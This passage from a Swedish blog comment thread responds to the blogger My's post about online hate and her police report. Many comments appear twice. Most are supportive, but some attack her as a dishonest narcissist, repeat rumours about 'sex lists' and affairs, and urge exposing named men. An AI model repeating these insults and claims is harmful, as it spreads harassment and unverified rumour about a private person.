   • Den människan kommer kontra dig till död-dagar ( hon är så jävla avund att…öh?) och hennes genuina avundsjuka till dig kommer ta död på dig om Du tillåter. ,Hon är sjukt elak på alla tänkbara nivåer . Din ungdom svider överjävligt i henne där hon tvingas göra plastik och botox. Trist!! Jag trodde detta paret va vänliga men är tyvärr sjukt narsic….nä uttalar det inte. Der räcker ! Jag följer iaf dig för attdu verkar genuin å jävligt gullig. Sov gott! 😘

 36. Kära My!
  tråkigt att du ska behöva stå ut med så mycket hat. Jag fattar inte hur dessa fega människor orkar hålla på. Anmäl allt! Låt andra hålla på med det !
  Ge dom inget mer utrymme!
  Jag säger bara Go Girl! Vi är många som tycker om dig! Fokusera på det!
  Kramar 💖

 37. Det är så otroligt skrämmande att det finns så mycket hat där ute. Framförallt mellan kvinnor. Vad är det som händer? Och varför går man in på någons blogg om man stör sig så mycket på den personen. Att sitta hemma, framför en skärm och skriva av sig hat på en annan människa som man egentligen inte känner, skulle vara intressant att se om personerna skulle klara att säga det här till dig irl. Kämpa på ! <3

 38. Är det inte dags att du d
  tar av dig din oklädsamma offerkoffa snart? samma malande om din hemska uppväxt, hur duktig du är, vad synd det är om dig, dyslexi osv osv. Överdrifter och smålögner hela tiden. Att gång på gång gå ut med att du gått ner 100 kilo är ju så fel då du var gravid då du vägde som mest. och din olämpliga flytt till Sigtuna för att förverlöiga dig själv, UTAN att en sekund reflektera över vilken turbulent tillvaro du utsätter din son för, och din hund och nu också en stackars kattunge. Och nej du har inte 100 tusentals läsare av din blogg, i dagsläget är det på ca 84 000. Håll dig till sanningen. Nej fy för sådana som du My. Oärlig och narcissistisk till din läggning är vad du är.
  Bara en sådan villfarelse du lever i, att många som kommenterar är en och samma person. Googla VPN-tjänster http://pcforalla.idg.se/2.1054/1.642462/test-vpn-surfa-anonymt så fattar du nog lite bättre. Vill man vara anonym på internet så är man ansluten till en sådan tjänst (ALLA kan vara det – inga konstigheter) och då får man samma IP- adress.
  Så ta av dig offerkoftan och väx upp och MOGNA!!

  • Jag anser inte att jag på något sätt bär en offerkofta. Tvärt om! Det är din åsikt, inte min poäng här överhuvudtaget. Jag tycker att man ska se över lagar/regler gällande näthat rent generellt. Vissa saker url är straffbara men inte samma på nätet osv. Sålänge ingen gör någonting så kommer det bara att bli värre och värre. Jag förväntar mig inte att det försvinner från mig. Men jag förväntar mig att det blir ett steg i rätt riktning… Det övriga du skriver om mitt privatliv, mitt hem, min son osv, vet du ingenting någonting. Anledningen till flytt osv rör inte dig. bara mig och min son. Jag ser till vårt bästa. Hannah? Vad har Hannah med detta att göra? Du känner väl inte henne? eller kanske du gör det? u har inagn anledning att säga åt mig vad jag ska göra, eller inte göra. Det blir ju bara ännu konstigare…

  • Väldigt intressant att du bryr dig om att läsa och dessutom kommentera någon som du så uppenbart ogillar. Varför gör du inte något kul med ditt liv iställlet för att reta dig på andra! Lägg energi på något som gör dig glad istället.
   Vi andra läser bloggar för att vi gillar dom och är det något man inte gillar så behöver man inte tala om det, lika lite som man gör det till någon person du möter. Det är precis samma sak på nätet man uppför sig helt enkelt. Se det som ett samtal mellan två personer eller flera. Inte beter du dig så här in real life!
   Det känns både onödigt och löjligt att du uppmanar en vuxen kvinna att ”växa upp och mogna”.
   Hoppas du gör något som får dig att må bättre vi här inne är inte särskilt imponerade av sådana löjliga och barnsliga kommenterar du har oavsett hur många alias du har.
   //Berith

   • Mina negativa kommentarer till vpn Ulrica . Om du ägnar Lika mycket tid till din egen blogg som du gör att skriva skit på Mys så kanske din blir bättre. Tekniken går framåt! Varje dag faktiskt så Snart kommer vi alla få veta vem du är och det kommer att bli ett sånt nöje för mig att berätta vem du är!
    Att vara oärlig och gömma sig bakom vpn konton är nog inte det bästa. Ärliga människor som står för vad dom säger behöver inte det.

  • Måste man gömma sig bakom VPN och dold identitet när man kommenterar på en blogg tycker jag man inte har något här eller på någon annan blogg att göra. FEGT är vad jag tycker det är!

 39. Tycker nästan synd om en människa som skriver så mycket otrevligt till någon annan, dessutom tar sig tid att läsa din blogg ordentligt och veta allt om allt du skrivit och sen lägga ner sån oerhörd energi på att ge sig på dig i skrift – för mig är det helt oförklarligt och meningslöst helt enkelt.

  Undrar alltid vad som driver en människa att avsky någon så till den milda grad, stackars människa ett sånt litet liv och ta sig tiden av sitt liv att avsky andra och smutskasta än att leva gott för sig själv och andra, unna glädje och lycka till andra människor. Inte undra på att fred på jorden aldrig händer förrän de onda hatarna tagit slut på allt gott liv som finns och förgör varann.

  Kramar till dig och all lycka önskar jag dig framöver o noll trollmejl hos dig vill jag se ♥

 40. Är nog första gången jag kommenterat här tror jag trots slavisk följare sedan ensam mamma tiden. Måste bara få säga att jag beundrar dig något fruktansvärt.
  Har själv fortfarande problem med stressen framförallt, inte så mkt ångest efter en långtidssjukskrivning pga av många olika orsaker för ett par år sedan. Varje dag är fortfarande en kamp mot stressen och att må helt bra. Jag älskar hur du lyfter problemen och trots att ha haft det riktigt tufft alltid är så vansinnigt positiv! Älskar ditt driv även när livet är som svårast. Att få mottaga så mkt skit från människor som inte har en aning om vem du är (mer än det de får läsa här) går över mitt förstånd, har man verkligen inget bättre för sig?
  Sååå roligt att du trivs med nya utbildningen, du ser glad ut på bilderna, härligt!
  Njut av livet så gott det går. Nya kontakter i skolan, lilleman, nya familjemedlemmen snart, vännerna och allt annat. Försök dock komma ihåg plånboken så du slipper stressa, Hahaha herregud vad jag skrattade igenkännande när jag läste det.
  Tack My för allt du delar med oss, du är helt fantastisk. Och jag längtar tills din bok kommer, även om jag gissar att den kommer då mig att grina som ett barn, men jag ser fram emot den.
  Ha en fin dag! Massa kramar och styrka till dig

 41. Bra My att du äntligen polisanmäler dessa allvarliga trakasserier, och som mamma måste du göra det, för ni måste ju känna trygghet någon gång i tillvaron. Till alla era hatare, tänk på att MY är en kvinna som har ett litet barn!!! Skäms på er!!!!
  Hoppas verkligen att tv3 kikar på detta och gör ett tv-program och identifierar vem det r som sitter och skriver på detta viset, dataexperter kan lätt ta fram alla IP-nummer och varifrån texter skrivs, inga som helst problem för dem.
  Härligt att se bilder på dig från din utbildning, o vilken kille som hjälpte dig med bensinproblemet häromdagen, vilken kompis! Sådana växer inte på träd.
  My tyvärr bottnar all denna avundsjukan i att du är UNG och snygg!! Omtyckt, mjuk i ditt sätt tvärtemot alla tuffa bloggerskor i Sthlm, tänk på att du har allt det som dessa sjuka människor saknar.
  Det är beundransvärt att du klarar igenom alla dina tragedier i livet på egen hand, hur många skulle klarat det. Sedan otrohet och överleva det med förståndet i behåll. Sedan en hemsk konkurs och reda ut detta på egen hand, helt otroligt vad du är stark My. På detta flytt från Öland till Sthlm, ny utbildning med allt vad det innebär. Alltså My, detta blir helt enkelt för mycket för alla dessa avundsjuka människor som aldrig klarat att stå på egna ben.
  Bilden idag var jättefin och vilka fantastiskt vackra ringar.
  Stå på dig tjejen du är stark och ett föredöme för många andra unga kvinnor!
  Ha en underbar dag!

 42. Fy fasen vad vidrigt, bra att du går till polisen med detta. Måste ju gå att få reda på vilka eller vilken som utsätter dig för dessa fruktansvärda kränkande kommentarer.
  Bra att du lyckas koncentrera dig på dina studier trots allt.
  Kram

 43. Fruktansvärt när det går ut över din son o det skrivs hemska saker. Inte ok annars heller att vräka av sig hemska saker.
  Du sticker ut o går din egen väg, reser dig gång på gång. Tror att det retar många, men det visar snarare motsatsen om just den personen, att man inte kan lyfta o peppa varandra i stället. Varför ska det va så svårt…
  Kram till dig ?

 44. Brukar sällan läsa bloggar men hamnade av någon konstig anledning på denna..Låter helt ofattbart att människor skriver så elaka och obegåvade kommentarer..Heja dig som säger ifrån ..verkar vara väldigt avundsjuka personer ..Kram på dig

 45. Nu tror jag inte ett dugg på skvallret om att Mys bästa väninnors män/makar/pojkvänner har legat med My för OM det vore så, hade väninnorna förmodligen separerat från sina otrogna karl-sluskar på studs. De som har minsta lilla självrespekt kvar, vill säga. 😉

  Men OM nu Mys bästa väninnors män stöter på My eller tom har legat med henne så bör de otrogna slibbiga gamla gubbarna hängas ut på Flashback per omgående.

  Den som påstår att My skulle vara tjock och ful måste gå till optikern och kontrollera synen. Alternativt åka till psyket för att få hjälp med att kontrollera sådan osund och sjuklig avundsjuka och bitterhet.

 46. Snubblade över ett delat inlägg på Fb och läste ditt inlägg. Du har redan skrivit det mesta om vad som kan sägas i ämnet och det är tråkigt att du behöver uppleva detta bara för att du är du och gör det du vill.

  Finns ingen logik i att folk sitter och hoppar på folk, där bakom sina datorer med svartsjukan dundrande i skallen. För en del av problemet är att det finns många bittra i sina egna ögon ”misslyckade” själar, ”offer” – som inte kan unna andra människor glädje lycka och framgång. Istället för att inspireras och göra något själv är det lättare att spy ut elakheter på nätet. Usch!

  Jag hoppas att du slipper det i framtiden men under tiden: ta åt dig så lite som du kan.

 47. Fast på nåt sätt ger du nättrollen vad de söker när du svarar och gör ett inlägg om det. För alla vet att det inte kommer sluta bara för att du skriver som du just skrev. Och ett nättrolls njutning är ju att se att du reagerar och tar åt dig. Andra bloggare som tex Hanna Graaf och andra får även Hatbrev men lägger locket på. Killen them with silence är det bästa!! De ska inte få utrymme eller njutningen av att veta att du blir upprörd över det. Så nättroll är nog något du får leva med. Har man en stor blogg blir det nog både ris och ros. Men ge aldrig nättrollen utrymme eller din energi som du just gjorde är mitt råd.

  • Ullis. Jag anser att du har en helt felaktig uppfattning. Nu lägger du bördan på My när du skriver ” Fast på nåt sätt ger du nättrollen vad de söker när du svarar och gör ett inlägg om det. ”??

   My ger inte några nättroll näring. Det är nättrollen som intar fel näring istället. Om jag själv hade haft en blogg och VARJE dag mötts av hat från nättroll, så hade jag också polisanmält trakasserierna till slut, i synnerhet med tanke på att man är mamma!

   Att inte agera är detsamma som att man tycker det är ok att folk får kasta skit på en, det är aldrig aldrig någonsin ok. Att barn mobbar varandra är fullständigt bedrövligt, men när vuxna människor mobbar andra så är det anmärkningsvärt i allra högsta grad. De sätter sig själva i sandlådan och trakasserar andra vuxna, och vi vuxna ska vara förebilder för barn, då måste vi också visa det genom att sätta ner foten mot vuxenmobbing.

 48. Massor med kärlek till dig❤️
  De som skriver skit till dig och om dig är så fega, de skulle ALDRIG våga säga det till dig ansikte mot ansikte.
  Det måste bli ett slut på detta näthat. Många som drabbas och som får sitt liv förstört.
  / Lena

 49. Det är så otroligt skrämmande att det finns så mycket hat där ute. Framförallt mellan kvinnor. Vad är det som händer? Och varför går man in på någons blogg om man stör sig så mycket på den personen. Att sitta hemma, framför en skärm och skriva av sig hat på en annan människa som man egentligen inte känner, skulle vara intressant att se om personerna skulle klara att säga det här till dig irl. Kämpa på ! <3

 50. Är det inte dags att du d
  tar av dig din oklädsamma offerkoffa snart? samma malande om din hemska uppväxt, hur duktig du är, vad synd det är om dig, dyslexi osv osv. Överdrifter och smålögner hela tiden. Att gång på gång gå ut med att du gått ner 100 kilo är ju så fel då du var gravid då du vägde som mest. och din olämpliga flytt till Sigtuna för att förverlöiga dig själv, UTAN att en sekund reflektera över vilken turbulent tillvaro du utsätter din son för, och din hund och nu också en stackars kattunge. Och nej du har inte 100 tusentals läsare av din blogg, i dagsläget är det på ca 84 000. Håll dig till sanningen. Nej fy för sådana som du My. Oärlig och narcissistisk till din läggning är vad du är.

  Bara en sådan villfarelse du lever i, att många som kommenterar är en och samma person. Googla VPN-tjänster https://pcforalla.idg.se/2.1054/1.642462/test-vpn-surfa-anonymt så fattar du nog lite bättre. Vill man vara anonym på internet så är man ansluten till en sådan tjänst (ALLA kan vara det – inga konstigheter) och då får man samma IP- adress.

  Så ta av dig offerkoftan och väx upp och MOGNA!!

  • Jag anser inte att jag på något sätt bär en offerkofta. Tvärt om! Det är din åsikt, inte min poäng här överhuvudtaget. Jag tycker att man ska se över lagar/regler gällande näthat rent generellt. Vissa saker url är straffbara men inte samma på nätet osv. Sålänge ingen gör någonting så kommer det bara att bli värre och värre. Jag förväntar mig inte att det försvinner från mig. Men jag förväntar mig att det blir ett steg i rätt riktning… Det övriga du skriver om mitt privatliv, mitt hem, min son osv, vet du ingenting någonting. Anledningen till flytt osv rör inte dig. bara mig och min son. Jag ser till vårt bästa. Hannah? Vad har Hannah med detta att göra? Du känner väl inte henne? eller kanske du gör det? u har inagn anledning att säga åt mig vad jag ska göra, eller inte göra. Det blir ju bara ännu konstigare…

  • Väldigt intressant att du bryr dig om att läsa och dessutom kommentera någon som du så uppenbart ogillar. Varför gör du inte något kul med ditt liv iställlet för att reta dig på andra! Lägg energi på något som gör dig glad istället.

   Vi andra läser bloggar för att vi gillar dom och är det något man inte gillar så behöver man inte tala om det, lika lite som man gör det till någon person du möter. Det är precis samma sak på nätet man uppför sig helt enkelt. Se det som ett samtal mellan två personer eller flera. Inte beter du dig så här in real life!

   Det känns både onödigt och löjligt att du uppmanar en vuxen kvinna att ”växa upp och mogna”.

   Hoppas du gör något som får dig att må bättre vi här inne är inte särskilt imponerade av sådana löjliga och barnsliga kommenterar du har oavsett hur många alias du har.

   //Berith

  • Antar att du ”Ulrica’ kommenterar via en sådan vpn….för inte heter du väl Ulrica?
   Till My: alltså du är såååå BRA 💖💖💖

   • Mina negativa kommentarer till vpn Ulrica . Om du ägnar Lika mycket tid till din egen blogg som du gör att skriva skit på Mys så kanske din blir bättre. Tekniken går framåt! Varje dag faktiskt så Snart kommer vi alla få veta vem du är och det kommer att bli ett sånt nöje för mig att berätta vem du är!
    Att vara oärlig och gömma sig bakom vpn konton är nog inte det bästa. Ärliga människor som står för vad dom säger behöver inte det.

  • Måste man gömma sig bakom VPN och dold identitet när man kommenterar på en blogg tycker jag man inte har något här eller på någon annan blogg att göra. FEGT är vad jag tycker det är!

 51. Är nog första gången jag kommenterat här tror jag trots slavisk följare sedan ensam mamma tiden. Måste bara få säga att jag beundrar dig något fruktansvärt.
  Har själv fortfarande problem med stressen framförallt, inte så mkt ångest efter en långtidssjukskrivning pga av många olika orsaker för ett par år sedan. Varje dag är fortfarande en kamp mot stressen och att må helt bra. Jag älskar hur du lyfter problemen och trots att ha haft det riktigt tufft alltid är så vansinnigt positiv! Älskar ditt driv även när livet är som svårast. Att få mottaga så mkt skit från människor som inte har en aning om vem du är (mer än det de får läsa här) går över mitt förstånd, har man verkligen inget bättre för sig?
  Sååå roligt att du trivs med nya utbildningen, du ser glad ut på bilderna, härligt!

  Njut av livet så gott det går. Nya kontakter i skolan, lilleman, nya familjemedlemmen snart, vännerna och allt annat. Försök dock komma ihåg plånboken så du slipper stressa, Hahaha herregud vad jag skrattade igenkännande när jag läste det.
  Tack My för allt du delar med oss, du är helt fantastisk. Och jag längtar tills din bok kommer, även om jag gissar att den kommer då mig att grina som ett barn, men jag ser fram emot den.
  Ha en fin dag! Massa kramar och styrka till dig

 52. Bra My att du äntligen polisanmäler dessa allvarliga trakasserier, och som mamma måste du göra det, för ni måste ju känna trygghet någon gång i tillvaron. Till alla era hatare, tänk på att MY är en kvinna som har ett litet barn!!! Skäms på er!!!!

  Hoppas verkligen att tv3 kikar på detta och gör ett tv-program och identifierar vem det r som sitter och skriver på detta viset, dataexperter kan lätt ta fram alla IP-nummer och varifrån texter skrivs, inga som helst problem för dem.

  Härligt att se bilder på dig från din utbildning, o vilken kille som hjälpte dig med bensinproblemet häromdagen, vilken kompis! Sådana växer inte på träd.

  My tyvärr bottnar all denna avundsjukan i att du är UNG och snygg!! Omtyckt, mjuk i ditt sätt tvärtemot alla tuffa bloggerskor i Sthlm, tänk på att du har allt det som dessa sjuka människor saknar.

  Det är beundransvärt att du klarar igenom alla dina tragedier i livet på egen hand, hur många skulle klarat det. Sedan otrohet och överleva det med förståndet i behåll. Sedan en hemsk konkurs och reda ut detta på egen hand, helt otroligt vad du är stark My. På detta flytt från Öland till Sthlm, ny utbildning med allt vad det innebär. Alltså My, detta blir helt enkelt för mycket för alla dessa avundsjuka människor som aldrig klarat att stå på egna ben.

  Bilden idag var jättefin och vilka fantastiskt vackra ringar.

  Stå på dig tjejen du är stark och ett föredöme för många andra unga kvinnor!

  Ha en underbar dag!

 53. Livet är för kort. Det är synd om dessa människor som behöver låta sina känslor, missunnsamhet och troligtvis ensamhet och dålig självkänsla gå ut över andra. I en värld där det är så mycket annat hemskt som pågår så borde man använda sina åsikter till detta istället. Än att kommentera till någon som har en blogg?
  Jag önskar dig My allt gott och som mamma vet jag att du gör det bästa du kan för din familj och jag ser en tjej men skinn på näsan, styrka och omtanke med ett vackert leende.
  Så försök att låta allt dumt rinna av dig och gå ut och Ta vara på varje dag!
  Kramar Maria

 54. Men usch vilka hemska människor det finns, helt otroligt hur människor kan, vill, orkar lägga energi på sånt här..att vara elaka mot människor dom inte känner över huvud taget, det är aldrig någonsin okej med sånna här påhopp! Bra att du sätter ner foten, för du har så rätt det är inte okej någonstans!! Men som du förstår har du ju massor av trogna följare som läser din blogg just för att den är härlig, inspirerande, ärlig och personlig ?! <3

 55. Fruktansvärt när det går ut över din son o det skrivs hemska saker. Inte ok annars heller att vräka av sig hemska saker.
  Du sticker ut o går din egen väg, reser dig gång på gång. Tror att det retar många, men det visar snarare motsatsen om just den personen, att man inte kan lyfta o peppa varandra i stället. Varför ska det va så svårt…
  Kram till dig 🙂

 56. Brukar sällan läsa bloggar men hamnade av någon konstig anledning på denna..Låter helt ofattbart att människor skriver så elaka och obegåvade kommentarer..Heja dig som säger ifrån ..verkar vara väldigt avundsjuka personer ..Kram på dig

 57. Jag hoppas att du även har polisanmält de bloggare som lägger ut och sprider sexlistorna, vilka små patetiska kryp! Kram och heja dej My!

  • Fast finns det verkligen några bloggare som lagt ut och spridit sexlistor!? Har Du sett sexlistor hos andra bloggare eller har Någon sett sexlistor som Cirkulerat verkligen??? Nej inte helt säker på det va…en läsarkommentar med några namn såg jag på en mindre blogg som verkade tagits bort ganska omgående av blogginnehavaren..det blev sen till i annan mun/blogg sexlista och nu listor.

    • ojdå…vilka bloggar har dessa ”listor” kunnat skådas på då? En vet jag ju. Tre olika tillfällen och det var listor?? okej har jag helt missat trots att jag följer flera bloggar ganska slaviskt…tyvärr så litar jag inte på allt du säger och skriver men det är tur att så många är blåsta och korkade som tror på allt som vissa bloggare skriver..tror nog sk listan/listorna blivit kända för att du själv skrev ut att det cirkulerar listor, varför föra fram det i ljuset liksom hmm..men alla är vi olika och alla knep är bra. Och det där sjuka ”Johan” skrivit var det till dig han skrivit??

     • Ja vi är väldigt olika verkligen, det jag ser som väldigt lågt och elakt ser inte du och många andra. Jag tror jag är väldigt mycket mer intelligent, klarsynt och har bättre minne än många av dina läsare hehe.. Trist att du svarade utan att ge några sakliga och proffsiga svar, det blev nu helt utan substans ? Ha det så fint och lycka till med skola och projekt!

 58. Livet är för kort. Det är synd om dessa människor som behöver låta sina känslor, missunnsamhet och troligtvis ensamhet och dålig självkänsla gå ut över andra. I en värld där det är så mycket annat hemskt som pågår så borde man använda sina åsikter till detta istället. Än att kommentera till någon som har en blogg?
  Jag önskar dig My allt gott och som mamma vet jag att du gör det bästa du kan för din familj och jag ser en tjej men skinn på näsan, styrka och omtanke med ett vackert leende.
  Så försök att låta allt dumt rinna av dig och gå ut och Ta vara på varje dag!
  Kramar Maria

 59. Hej My! har aldrig kommenterat men det där va det värsta jag har sett. hur beter sig folk? jag är helt chockad. gillar din blogg och den är härligt att läsa allt du delar med dig av. och de som inte kan bete sig har inte här att göra. usch för dem. stor kram och ha en härlig dag

 60. vad va det som va så elakt med min kommentar? va jag elak för att jag ifrågasatte din trovärdighet?
  visst jag sitter bakom vpn precis som mååånga andra…. men det gör mig inte skyldig till hatkommentarer här inne…. jag känner mig precis som du falskt anklagad…. ska jag polisanmäla dig då el? jag har varken mobbat el näthatat dig… jag ifrågasatte o det är för mig en väldig skillnad… jag tänker inte heller ta tbx min känsla av att du spetsar dina inlägg som handlar om just ”sjukdom,ångest psykiska åkommor” … allt annat du skrivit om har jag inte brytt mig ett skit om… tråkigt att folk är så elaka mot dig men jag anser inte att jag är en av dom.

  • Polisanmälningen handlar inte om dig. ”betydligt värre än det som står ovan”. Men varför gömma sig bakom von? ”som alla andra” är ingen ursäkt för min del… Om alla andra attackerar en person så gör inte jag det också… Du ifrågasatte inte. du påstod. STOR skillnad.

    • ”Caboom 16 augusti, 2016 kl. 14:55
     vad va det som va så elakt med min kommentar? va jag elak för att jag ifrågasatte din trovärdighet?
     CABOOM!Vad har ”trovärdighet” med konkursen att göra? Du verkar inte riktigt med…

     • Eh? jag har endast skrivit om psykisk ohälsa…. Jag svara Katja där hon tyckte att jag visste precis hur My mådde… jag svara att det inte var underligt eftersom hon skriver om det nästan dagligen o precis som alla vet att hon gått i konkurs eftersom hon även skriver om det nästan dagligen… du verkar inte ha koll däremot!

  • Jag undrar vem som är oärlig! Varför gömma sig bakom ett vpn om man är på nätet med ärliga avsikter och dessutom står för dom! Spån!

 61. Men usch vilka hemska människor det finns, helt otroligt hur människor kan, vill, orkar lägga energi på sånt här..att vara elaka mot människor dom inte känner över huvud taget, det är aldrig någonsin okej med sånna här påhopp! Bra att du sätter ner foten, för du har så rätt det är inte okej någonstans!! Men som du förstår har du ju massor av trogna följare som läser din blogg just för att den är härlig, inspirerande, ärlig och personlig :D! <3

 62. Jag hoppas att du även har polisanmält de bloggare som lägger ut och sprider sexlistorna, vilka små patetiska kryp! Kram och heja dej My!

  • Fast finns det verkligen några bloggare som lagt ut och spridit sexlistor!? Har Du sett sexlistor hos andra bloggare eller har Någon sett sexlistor som Cirkulerat verkligen??? Nej inte helt säker på det va…en läsarkommentar med några namn såg jag på en mindre blogg som verkade tagits bort ganska omgående av blogginnehavaren..det blev sen till i annan mun/blogg sexlista och nu listor.

    • ojdå…vilka bloggar har dessa ”listor” kunnat skådas på då? En vet jag ju. Tre olika tillfällen och det var listor?? okej har jag helt missat trots att jag följer flera bloggar ganska slaviskt…tyvärr så litar jag inte på allt du säger och skriver men det är tur att så många är blåsta och korkade som tror på allt som vissa bloggare skriver..tror nog sk listan/listorna blivit kända för att du själv skrev ut att det cirkulerar listor, varför föra fram det i ljuset liksom hmm..men alla är vi olika och alla knep är bra. Och det där sjuka ”Johan” skrivit var det till dig han skrivit??

     • Ja vi är väldigt olika verkligen, det jag ser som väldigt lågt och elakt ser inte du och många andra. Jag tror jag är väldigt mycket mer intelligent, klarsynt och har bättre minne än många av dina läsare hehe.. Trist att du svarade utan att ge några sakliga och proffsiga svar, det blev nu helt utan substans 😉 Ha det så fint och lycka till med skola och projekt!

 63. Hej My! har aldrig kommenterat men det där va det värsta jag har sett. hur beter sig folk? jag är helt chockad. gillar din blogg och den är härligt att läsa allt du delar med dig av. och de som inte kan bete sig har inte här att göra. usch för dem. stor kram och ha en härlig dag

 64. vad va det som va så elakt med min kommentar? va jag elak för att jag ifrågasatte din trovärdighet?
  visst jag sitter bakom vpn precis som mååånga andra…. men det gör mig inte skyldig till hatkommentarer här inne…. jag känner mig precis som du falskt anklagad…. ska jag polisanmäla dig då el? jag har varken mobbat el näthatat dig… jag ifrågasatte o det är för mig en väldig skillnad… jag tänker inte heller ta tbx min känsla av att du spetsar dina inlägg som handlar om just ”sjukdom,ångest psykiska åkommor” … allt annat du skrivit om har jag inte brytt mig ett skit om… tråkigt att folk är så elaka mot dig men jag anser inte att jag är en av dom.

  • Polisanmälningen handlar inte om dig. ”betydligt värre än det som står ovan”. Men varför gömma sig bakom von? ”som alla andra” är ingen ursäkt för min del… Om alla andra attackerar en person så gör inte jag det också… Du ifrågasatte inte. du påstod. STOR skillnad.

    • ”Caboom 16 augusti, 2016 kl. 14:55
     vad va det som va så elakt med min kommentar? va jag elak för att jag ifrågasatte din trovärdighet?
     CABOOM!Vad har ”trovärdighet” med konkursen att göra? Du verkar inte riktigt med…

     • Eh? jag har endast skrivit om psykisk ohälsa…. Jag svara Katja där hon tyckte att jag visste precis hur My mådde… jag svara att det inte var underligt eftersom hon skriver om det nästan dagligen o precis som alla vet att hon gått i konkurs eftersom hon även skriver om det nästan dagligen… du verkar inte ha koll däremot!

  • Jag undrar vem som är oärlig! Varför gömma sig bakom ett vpn om man är på nätet med ärliga avsikter och dessutom står för dom! Spån!

 65. Men herregud….vuxna människor. Varför varför läser ni My’s blogg om hon nu är så vidrig? Jag får inte ihop det. Och du Ulrika, du bör ju vara en person som stått My relativt nära eftersom du vet så mycket om hennes vikt, hennes flytt, hennes blogg, hennes liv. Skulle vara rätt intressant om ditt rätta jag avslöjades:-). Och ordet ”offerkofta” kan nästan avslöja dig. My du är underbar som står emot all denna hets mot dig ❤️. Det goda vinner ALLTID över det onda. Keep up the good work som jag skrev till Åza

  • Söta Mari, Ulrika behöver knappast ha stått My nära för att hon känner till saker som my skrivit om i bloggen, det vet ju alla som följt bloggen en längre tid. Varför skulle ordet ”offerkofta” avslöja henne? förstår vem du tänker på men nej det tror jag inte, det är många som använder ordet offerkofta. Fast står My verkligen emot hetsen, skapar väl lite hetsen själv genom såna här återkommande inlägg där hon samtidigt försöker svartmåla andra bloggare, precis som du Mari gör nu och flera andra som kommenterat ser jag, är ni då så mycket bättre än de sk näthatarna? Det kallas dubbelmoral! Lågt och elakt i mina ögon. Men du har rätt i en sak: Det goda vinner Alltid el iaf Oftast över det onda! Och jag är ingen bloggare och har inte vpn eller vad det kallas som ni skriver om, har inte ens en aning om vad jag själv har för ip-nr, och jag har aldrig näthatat, aldrig skrivit elakheter men ifrågasatt absolut, tycker inte det är näthat och tkr inte att Caboo näthatar heller, därmed inte sagt att det inte är fruktansvärt med näthat som en del av det My skrivit ut, hemskt men har tyvärr sett så mkt värre saker på andra bloggar. Och hot är ju fruktansvärt Om det förekommer och ska då såklart anmälas.

 66. Så bra och superviktigt skrivet My! Dessa nättroll mår så fruktansvärt dåligt, saknar självförtroende och hatar sin omgivning men allra mest sig själva. Så sorgligt! Nä fortsätt som du gör, stå upp för den vackra, kreativa kloka tjej du verkar vara. Kram

 67. Läser din blogg men har aldrig kommenterat tidigare… Nu kände jag att det var dags. Sååå starkt skrivet! Jag beundrar din styrka och ärlighet! Du är en förebild för unga kvinnor, entreprenörer och mammor ❤ styrkekramar till dig!

 68. Men herregud….vuxna människor. Varför varför läser ni My’s blogg om hon nu är så vidrig? Jag får inte ihop det. Och du Ulrika, du bör ju vara en person som stått My relativt nära eftersom du vet så mycket om hennes vikt, hennes flytt, hennes blogg, hennes liv. Skulle vara rätt intressant om ditt rätta jag avslöjades:-). Och ordet ”offerkofta” kan nästan avslöja dig. My du är underbar som står emot all denna hets mot dig ❤️. Det goda vinner ALLTID över det onda. Keep up the good work som jag skrev till Åza

  • Söta Mari, Ulrika behöver knappast ha stått My nära för att hon känner till saker som my skrivit om i bloggen, det vet ju alla som följt bloggen en längre tid. Varför skulle ordet ”offerkofta” avslöja henne? förstår vem du tänker på men nej det tror jag inte, det är många som använder ordet offerkofta. Fast står My verkligen emot hetsen, skapar väl lite hetsen själv genom såna här återkommande inlägg där hon samtidigt försöker svartmåla andra bloggare, precis som du Mari gör nu och flera andra som kommenterat ser jag, är ni då så mycket bättre än de sk näthatarna? Det kallas dubbelmoral! Lågt och elakt i mina ögon. Men du har rätt i en sak: Det goda vinner Alltid el iaf Oftast över det onda! Och jag är ingen bloggare och har inte vpn eller vad det kallas som ni skriver om, har inte ens en aning om vad jag själv har för ip-nr, och jag har aldrig näthatat, aldrig skrivit elakheter men ifrågasatt absolut, tycker inte det är näthat och tkr inte att Caboo näthatar heller, därmed inte sagt att det inte är fruktansvärt med näthat som en del av det My skrivit ut, hemskt men har tyvärr sett så mkt värre saker på andra bloggar. Och hot är ju fruktansvärt Om det förekommer och ska då såklart anmälas.

 69. Så bra och superviktigt skrivet My! Dessa nättroll mår så fruktansvärt dåligt, saknar självförtroende och hatar sin omgivning men allra mest sig själva. Så sorgligt! Nä fortsätt som du gör, stå upp för den vackra, kreativa kloka tjej du verkar vara. Kram

 70. Läser din blogg men har aldrig kommenterat tidigare… Nu kände jag att det var dags. Sååå starkt skrivet! Jag beundrar din styrka och ärlighet! Du är en förebild för unga kvinnor, entreprenörer och mammor ❤ styrkekramar till dig!

 71. Jag vet inte vad som är sant och vad som är falskt, jag har aldrig träffat My och inte er näthatare heller. Vad jag däremot vet är att jag inte för allt i världen förstår vad ni håller på med och hade ni varit mina barn hade jag gråtit mig till sömns varenda natt.
  Ni som hatar, vad har gjort er till den ni är idag?

 72. Det är så uppenbart att det finns vissa sjukligt manipulativa människor här som skriver kommentarer i ett enda syfte – att försöka svartmåla My och framställa henne i dålig dager. Varför har du/ni detta sjukliga behov av att insinuera/påstå saker och ifrågasätta minsta lilla angående en annan (främmande?) människas liv? SÖK HJÄLP! Det är inte My det är fel på.

 73. Jag vet inte vad som är sant och vad som är falskt, jag har aldrig träffat My och inte er näthatare heller. Vad jag däremot vet är att jag inte för allt i världen förstår vad ni håller på med och hade ni varit mina barn hade jag gråtit mig till sömns varenda natt.

  Ni som hatar, vad har gjort er till den ni är idag?

 74. Det är så uppenbart att det finns vissa sjukligt manipulativa människor här som skriver kommentarer i ett enda syfte – att försöka svartmåla My och framställa henne i dålig dager. Varför har du/ni detta sjukliga behov av att insinuera/påstå saker och ifrågasätta minsta lilla angående en annan (främmande?) människas liv? SÖK HJÄLP! Det är inte My det är fel på.

 75. Du är grym My! Du är en förebild för alla tjejer (och killar) i alla åldrar. Du visar att det går att lyckas, misslyckas och att resa sig!
  Hälsar en mamma och entreprenör på 45 år, som är mkt imponerad av dig!

 76. Du är grym My! Du är en förebild för alla tjejer (och killar) i alla åldrar. Du visar att det går att lyckas, misslyckas och att resa sig!
  Hälsar en mamma och entreprenör på 45 år, som är mkt imponerad av dig!

 77. Hej My!
